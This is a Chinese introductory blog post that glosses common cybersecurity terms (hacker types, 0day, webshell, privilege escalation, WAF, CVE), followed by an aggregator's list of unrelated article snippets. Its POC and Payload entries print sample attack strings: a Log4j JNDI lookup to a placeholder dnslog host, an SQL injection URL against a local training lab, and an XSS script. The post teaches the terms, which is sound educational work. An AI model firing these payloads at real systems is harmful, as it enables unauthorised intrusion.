Day1--什么是网络安全?网络安全常用术语

news2024/11/15 23:42:33

目录

1. 什么是网络安全?

信息系统(Information System)

信息系统安全三要素(CIA)

网络空间安全管理流程

网络安全管理

2. 网络安全的常用术语

3. 网络安全形势

4. 中国网络安全产业现状


1. 什么是网络安全?

        网络空间安全包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”。

信息系统(Information System)

        是由计算机硬件网络通信设备计算机软件信息资源信息用户规章制度组成的以处理信息流为目的的人机一体化系统。

信息系统安全三要素(CIA)

  • 保密性(Confidentiality)
  • 完整性(Integrity)
  • 可用性(Availability)

网络空间安全管理流程

  1. 确定网络信息安全管理对象
  2. 评估网络信息安全管理对象的价值
  3. 识别网络信息安全管理对象的威胁
  4. 识别网络信息安全管理对象的脆弱性
  5. 确定网络信息安全管理对象的风险级别
  6. 制定网络信息安全防范体系及防范措施实施和落实网络信息安全防范措施
  7. 运行/维护网络信息安全设备、配置

网络安全管理

  • 《中华人民共和国网络安全法》
  • 《Cybersecurity Law of the People's Republic of China》

2. 网络安全的常用术语

黑客(hacker)对计算机技术非常擅长的人,窃取数据、破坏计算机系统。
脚本小子刚刚入门安全行业,学习了一些技术,只会用现成的工具或者从网上复制代码。
白帽子

· 白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题。

· 360补天、漏洞盒子、CNVD、CNNVD

红帽黑客有正义感、爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。

漏洞(vulnerability)

· 漏洞指的是硬件、软件协议等等存在的安全缺陷

· https://www.cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3

POC

· Proof of Concept

· 能证明漏洞存在的代码

· 例:${jndi:ldap://xxxxxx.dnslog.cn/test}

EXP

· Exploit--利用

· 执行了这一段利用代码之后,就能够达到攻击的目的。

Payload(攻击载荷)

· SQL注入--http://localhost/sqli-labs/Less-3/?id=-1')union select 1.l.database()--+

· XSS--<script>alert(1)</script>

· log4j--${jndi:ldap://xxxxxx.dnslog.cn/test}

0day漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞。【危害力很大】
1day

漏洞的POC和EXP已经被公开了,但是很多人还来不及修复这个叫做1day漏洞。 

Nday漏洞

指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。

漏扫基于数据库对漏洞进行自动化扫描。
补丁(patch)漏洞的修复程序。
渗透(penetration)

黑客入侵了网站或者计算机系统,获取控制计算机权限的过程。

渗透测试

(penetration test)

用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据。

木马

(Trojan horse)

隐藏在计算机中的恶意程序。
病毒(Virus)恶意代码程序。
杀毒软件瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360
免杀绕过杀毒软件。
肉鸡已经被黑客获得的控制权限的机器,可能是个人电脑也可能是企业或者单位的服务器,通常情况下因为使用者不知道已经被入侵,所以黑客可以长期获得权限和控制。
抓鸡利用出现概率非常高的漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。
跳板机黑客为了防止被追溯和识别身份,一般不会用自己的电脑发起攻击,而是利用获取到的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色。
DDos

· Distributed Denial of Service

· 分布式拒绝服务攻击

· 发起大量恶意请求,导致正常用户无法访问。

后门(backdoor)黑客为了对主机进行长期的控制,在机器上种植一段程序或留下一个“入口”。

中间人攻击(MITM)

· Man-in-the-Middle Attack

· MITM攻击

· 运行中间服务器,拦截并篡改数据

网络钓鱼

钓鱼网站指的是冒充的网站,用来窃取用户的账号密码。
webshell

· shell是一种命令执行工具,可以对计算机进行控制。

· webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作。

Getshell

· 获得命令执行环境的操作。

· Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器。

提权(Privilege Escalation)

· 权限提升

· 普通用户权限,把自己提升为管理员权限的擦欧总就叫做提权。

拿站指得到一个网站的最高权限,即得到后台和管理员名字和密码。
拖库(脱裤)托库指的是网站被入侵以后,黑客把全部的数据都导出,窃取到了数据文件。
撞库用获得的裤子去批量登录其他网站。
旁站入侵

入侵服务器的其他网站。

横向移动攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器。
代理(Proxy)帮我们发起网络请求的一台服务器。
VPN

· Virtual Peivate Network

· 代理

· 加密通信

· 办公--在家里连接到公司内网

蜜罐(Honeypot)吸引攻击者攻击的伪装系统,用来实现溯源和反制。
沙箱(Sandbox)

· 沙箱是一种按照安全策略限制程序行为的执行环境,就算又恶意代码,也只能影响沙箱环境而不会影响到操作系统。 (360安全浏览器--带沙箱功能)

· 微步在线云沙箱:https://s.threatbook.com/

靶场

· 模拟的有漏洞的环境

· 可以是网站、容器、操作系统

堡垒机

· 跳板机--jumpserver

· 运维审计系统--管理资源,审批、审计、访问控制、事件记录

WAF

· Web Application Firewall

· Web应用防火墙。

· 对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为。

· WAF使用场景:例如服务器中有些安全性比较差的应用程序,审计和修改全部代码比较麻烦,这时候最好的办法就似乎通过部署WAF来实现安全防护。

· WAF可以防护的常见风险包括:SQL注入、XSS、利用本地/远程文件包含漏洞进行攻击、PHP代码注入、黑客扫描网站,源代码/错误信息泄露等等。

APT攻击

· Advanced Persistent Threat

· 高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动。

· 2021深信服APT攻防趋势半年洞察。

护网国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习。
CTF

CVE

· Common Vulnerabilities and Exposures--通用漏洞披露

· Mitre

· 例如:CVE-2021-4422/

· CVE Website

CNVD

· 国家信息安全漏洞共享平台--https://www.cnvd.org.cn/

· 国家计算机应激响应中心  CNCERT维护--国家互联网应急中心

 应急响应一个公司为了应对各种安全时间所做的准备和事后采取的措施。

SRC

· Security Response Center---企业的应急响应中心

· SRCs|安全应急响应中心 - 0xsafe

公益SRC

· 漏洞盒子 - 中国领先的漏洞平台与白帽社区|安全众测与安全运营服务平台

· 教育漏洞报告平台(EDUSRC)

网络空间测绘

· 网络空间资源收录

ATT&CK

· 风险分析模型--收集威胁情报,模拟APT攻击

逆向(Reverse)· 把程序还原为源代码,分析程序的运行过程
DevOps

· Development +Operations--安全开发与运维

· 开发测试运维一体化

CICD
等保

· 网络安全等级保护

· 要求相关行业单位和公司的信息系统必须进行定级,然后再公安机关备案,然后建设整改,然后由测评机构评级,并且持续维护和监督。

3. 网络安全形势

        FireEye网络威胁地图:

                https://www.fireeye.com/cyber-map/threat-map.html

        卡巴斯基实时威胁地图:

                地图 | 卡巴斯基网络威胁实时地图

        安全事件分类:GBZ20986-2007《信息安全技术 信息安全事件分类分级指南》

4. 中国网络安全产业现状

        安全产业:
                中国网络安全行业全景图(2020年3月第七版).pdf

                CCSIP 2021中国网络安全产业全景图第三版final.pdf

                2021年网络安全产业分析报告V1.020211011
                

                2021年网络安全产业态势总结

                        https://www.secrss.com/articles/38043

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1622067.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

pnpm install报错 Value of “this“ must be of type URLSearchParams

执行pnpm install的时候就报错Value of “this” must be of type URLSearchParams 由于之前执行没有出现过这个问题&#xff0c;最近在使用vue3所以使用了高版本的node&#xff0c;怀疑是node版本的问题。 解决&#xff1a; 检查node版本 node -v当前使用的是20.11.0的 修改…

婚恋app系统开发相亲交友小程序源码单身交友app软件下载客户管理系统婚恋交友平台管理系统源码h5聊天室源码

在数字化时代&#xff0c;婚恋相亲交友小程序以其便捷、高效、智能的特点&#xff0c;受到了越来越多人的青睐。红娘婚恋相亲交友系统源码&#xff0c;凭借其对微信小程序、微信公众号、H5以及APP的全方位支持&#xff0c;成为了婚恋市场的明星产品。 首先&#xff0c;婚恋相亲…

力扣HOT100 - 124. 二叉树中的最大路径和

解题思路&#xff1a; class Solution {int max Integer.MIN_VALUE;public int maxPathSum(TreeNode root) {maxGain(root);return max;}public int maxGain(TreeNode node) {if (node null) return 0;int leftGain Math.max(maxGain(node.left), 0);int rightGain Math.ma…

go+react实现远程vCenter虚拟机管理终端

文章目录 React-VcenterDemoQuick Start React-Vcenter 基于go & react实现远程vSphere vcenter虚拟机终端console页面&#xff0c;提供与vcenter管理中的Launch Web Console相同的功能。 项目地址&#xff1a;react-vcenter Demo URL: http://localhost:3000 Quick St…

Unity 踩坑记录 Rigidbody 刚体重力失效

playerSetting > physics > Gravity > 设置 Y 的值为负数

《苍穹外卖》Day07部分知识点记录

一、菜品缓存 减少查询数据库的次数&#xff0c;优化性能 客户端&#xff1a; package com.sky.controller.user;import com.sky.constant.StatusConstant; import com.sky.entity.Dish; import com.sky.result.Result; import com.sky.service.DishService; import com.sky…

使用微软Phi-3-mini模型快速创建生成式AI应用

微软Phi-3大语言模型是微软研究院推出的新一代系列先进的小语言模型。Phi-3系列包括phi-3-mini、phi-3-small和phi-3-medium三个不同规模的版本。这些模型在保持较小的参数规模的同时&#xff0c;通过精心设计的训练数据集和优化的算法&#xff0c;实现了与大型模型相媲美的语言…

软件测试之【软件测试概论三】

读者大大们好呀&#xff01;&#xff01;!☀️☀️☀️ &#x1f525; 欢迎来到我的博客 &#x1f440;期待大大的关注哦❗️❗️❗️ &#x1f680;欢迎收看我的主页文章➡️寻至善的主页 文章目录 前言测试用例的前因后果测试用例的设计方法黑盒测试用例设计方法&#x1f525…

JavaEE 初阶篇-深入了解 I/O 流(FileInputStream 与 FileOutputStream 、Reader 与 Writer)

&#x1f525;博客主页&#xff1a; 【小扳_-CSDN博客】 ❤感谢大家点赞&#x1f44d;收藏⭐评论✍ 文章目录 1.0 I/O 流概述 2.0 文件字节输入流(FileInputStream) 2.1 创建 FileInputStream 对象 2.2 读取数据 2.3 关闭流 3.0 文件字节输出流(FileOutputStream) 3.1 创建 Fi…

html、css、QQ音乐移动端静态页面,资源免费分享,可作为参考,提供InsCode在线运行演示

CSDN将我上传的免费资源私自变成VIP专享资源&#xff0c;且作为作者的我不可修改为免费资源&#xff0c;不可删除&#xff0c;寻找客服无果&#xff0c;很愤怒&#xff0c;&#xff08;我发布免费资源就是希望大家能免费一起用、一起学习&#xff09;&#xff0c;接下来继续寻找…

智慧医院解决方案

5G智慧导航解决方案https://www.cgltzk.vip/doc/1537/ 深圳市妇幼保健院妇产科住院大楼智能化系统招标文件(技术规格书)https://www.cgltzk.vip/doc/1534/ 三甲医院智能化系统设计方案https://www.cgltzk.vip/doc/1423/ 医院智能化设计方案https://www.cgltzk.vip/doc/1422/ …

矩阵按列相乘运算的并行化实现方法

这两天一直在琢磨如下矩阵计算问题。 已知dm矩阵X和hq矩阵Y&#xff0c;求如下矩阵&#xff1a; 其中X(:,i), Y(:,j)分别表示矩阵X, Y的第i列和第j列&#xff0c;易知Z为dh矩阵。 如果直接串行计算矩阵Z&#xff0c;两个循环共有mq&#xff0c;则会很慢&#xff0c;能不能并行化…

UE5 GAS开发P34 游戏效果理论

GameplayEffects Attributes&#xff08;属性&#xff09;和Gameplay Tags&#xff08;游戏标签&#xff09;分别代表游戏中实体的特性和标识。 Attributes&#xff08;属性&#xff09;&#xff1a;Attributes是用来表示游戏中实体的特性或属性的值&#xff0c;例如生命值、…

Ant Design Vue + js 表格计算合计

1.需要计算的数量固定&#xff08;如表1&#xff0c;已知需要计算的金额为&#xff1a;装修履约保证金 装修垃圾清运费出入证工本费 出入证押金 这四项相加&#xff0c;可以写成固定的算法&#xff09;&#xff1a; 表格样式&#xff1a; <h4 style"margin: 0 0 8px…

【数据结构】图(Graph)

文章目录 概念图的存储方式邻接矩阵邻接矩阵表示法邻接矩阵表示法的特点 邻接表邻接表表示法邻接表表示法的特点邻接表表示法的定义与实现查找插入删除其它构造函数析构函数创建图输出图 图的遍历深度优先遍历&#xff08;DFS&#xff09;广度优先遍历 图的连接分量和生成树生成…

Xilinx 7系列MMCM/PLL的使用模型

本文展示了MMCM的一些使用模型&#xff08;同样适用于PLL&#xff09;&#xff0c;如时钟网络去偏斜、具有内部反馈的MMCM和零延迟缓冲区等。 1、时钟网络去偏斜&#xff08;Clock Network Deskew&#xff09; MMCM的主要用途之一是用于时钟网络去偏斜。图3-11和图3-12展示了…

【2024年最新】NodeMCU-ESP8266刷AT固件教程——适用于esp-12E和esp-12F

硬件图片 原理图 0、工具打包下载 工具包 密码:keduo 1、工具及固件下载 固件下载地址&#xff1a; 欢迎 | 安信可科技 (ai-thinker.com) 下载以下固件&#xff1a; 直接下载地址&#xff1a;AT 固件&#xff08;固件号&#xff1a;0781&#xff09; 下载以下工具&#xf…

【SQL代理中转注入】对DVWA登录界面username字段实施注入

一、实验过程 步骤0&#xff1a;注释掉相关username防护&#xff0c;截图如下&#xff1a; 以DVWA为攻击目标&#xff0c;将login.php中第21、22行注释掉 步骤1&#xff1a;源码分析&#xff0c;截图如下&#xff1a; 如此可知&#xff0c;首先需要通过token验证&#xff0c;然…

LeetCode90:子集②

题目描述 给你一个整数数组 nums &#xff0c;其中可能包含重复元素&#xff0c;请你返回该数组所有可能的 子集 &#xff08;幂集&#xff09;。 解集 不能 包含重复的子集。返回的解集中&#xff0c;子集可以按 任意顺序 排列。 解题思想 要考虑去重的操作 代码 class Sol…

【java、微服务】MQ

MQ(MessageQueue)&#xff0c;中文是消息队列&#xff0c;字面来看就是存放消息的队列。也就是事件驱动架构中的Broker。 同步通讯 优点 时效性较强&#xff0c;可以立即得到结果 问题 微服务间基于Feign的调用就属于同步方式&#xff0c;存在一些问题。 耦合度高。每次加…